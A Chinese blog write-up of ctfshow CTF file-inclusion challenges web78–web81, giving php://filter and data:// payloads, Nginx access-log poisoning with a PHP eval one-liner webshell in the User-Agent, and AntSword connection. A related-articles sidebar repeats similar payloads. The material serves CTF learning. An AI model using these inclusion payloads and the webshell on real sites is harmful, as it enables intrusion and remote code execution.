ctfshow web入门 web文件包含 web78--web81

最新推荐文章于 2024-04-28 20:33:33 发布
最新推荐文章于 2024-04-28 20:33:33 发布
阅读量311 收藏
点赞数 3
分类专栏: ctfshow 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/137355367
版权
本文介绍了PHP中使用伪协议进行文件操作时的安全隐患,如如何利用`php://filter`绕过过滤并查看flag.php内容,以及`data:`绕过方式访问日志文件。作者还提到使用`eval()`执行恶意代码并通过私信分享安全防范经验。
摘要由CSDN通过智能技术生成

文件包含常与php伪协议在一起用

经验之谈,学长跟我说的

web78

在这里插入图片描述

先从最常用的开始(filter)

php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php

构造payload为
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64密码
在这里插入图片描述
解密
在这里插入图片描述

web79

在这里插入图片描述php被过滤
用data绕过

data://text/plain;

base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
相当于
<?php system('cat flag.php');?>

构造payload

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

执行的操作就是查看flag.php
在这里插入图片描述查看源代码
在这里插入图片描述

web80

在这里插入图片描述data也被绕过
日志文件访问

?file=/var/log/nginx/access.log

在这里插入图片描述传马在user-argent

<?php eval($_POST['a']);?>

然后antsword连接
在这里插入图片描述不会antsword的连接的来私聊或者评论教你

web81

在这里插入图片描述多了冒号,没影响
具体操作如web80
在这里插入图片描述打开fl0g.php
在这里插入图片描述
web78–web79也可以日志包含连接木马查看flag(本人已试过)

baozongwi
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
CTFshow 文件包含 web81
Kradress的博客
12-08 287
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 15:51:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFshow_web入门_文件包含_web78-
weixin_43896504的博客
07-22 389
文件包含
ctfshow web78 获取flag(用老版的火狐浏览器)
最新发布
XiaoYeZhu_1314的博客
04-28 362
第一种:利用input伪协议 ,获取到flag。第二种:利用flter协议,获取到flag。第三种:利用data 协议 获取到fag。
linux nginx配置81端口用于访问web81
没有腹肌的程序员
11-24 2743
多配置一个default81.conf文件 server {     listen       81;     server_name  localhost;     root   /data/web81;     error_page   500 502 503 504  /50x.html;     location ~ \.php$ {         fastcgi_pass un...
ctfshow-web78(文件包含)
m0_62094846的博客
01-11 1259
if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?file=php://filter/read=convert.base64-encode/resource=flag.php
【CTFshow】文件包含web78-web81
weixin_51614272的博客
02-25 4513
文件包含web78-web81web78web79php://input伪协议data协议web80php://input伪协议日志包含绕过web81web82(没完全理解) web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctf.show文件包含(web78-web117)
wanan的博客
08-31 455
ctf.show文件包含(web78-web117)
《CTFshow-Web入门》09. Web 81~90
学习学习学习......
09-01 1467
include() 利用,一句话木马之 Nginx 日志利用、条件竞争写入木马、file_put_contents() 利用,伪协议(php://filter/)、伪协议(data://)、PHP 特性之 intval()。
ctfshow 文件包含 web 78 -117
shinygod的博客
02-27 1459
目录web 78web 79web 80web 81web 82 web 78 data://text/plain,<?php system("cat flag.php");?> php://filter/convert.base64-encode/resource=flag.php web 79 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= //PD9waHAgc3lzdGVtKCdjYXQgZmx
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7203
个人ctfshow刷题记录
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4175
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2406
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
ctfshow 文件包含Web78-79
m0_62584974的博客
04-15 1839
Ctfshow文件包含漏洞Web78 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回数据包,可以在爆破过程中去掉2.txt,只爆破目录即可。可以通过查看返回的数据包来获取目录中的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web185 正则爆破脚本](https://download.csdn.net/download/eason612/86793758)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFshow web入门——爆破](https://blog.csdn.net/qq_49480008/article/details/112991503)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值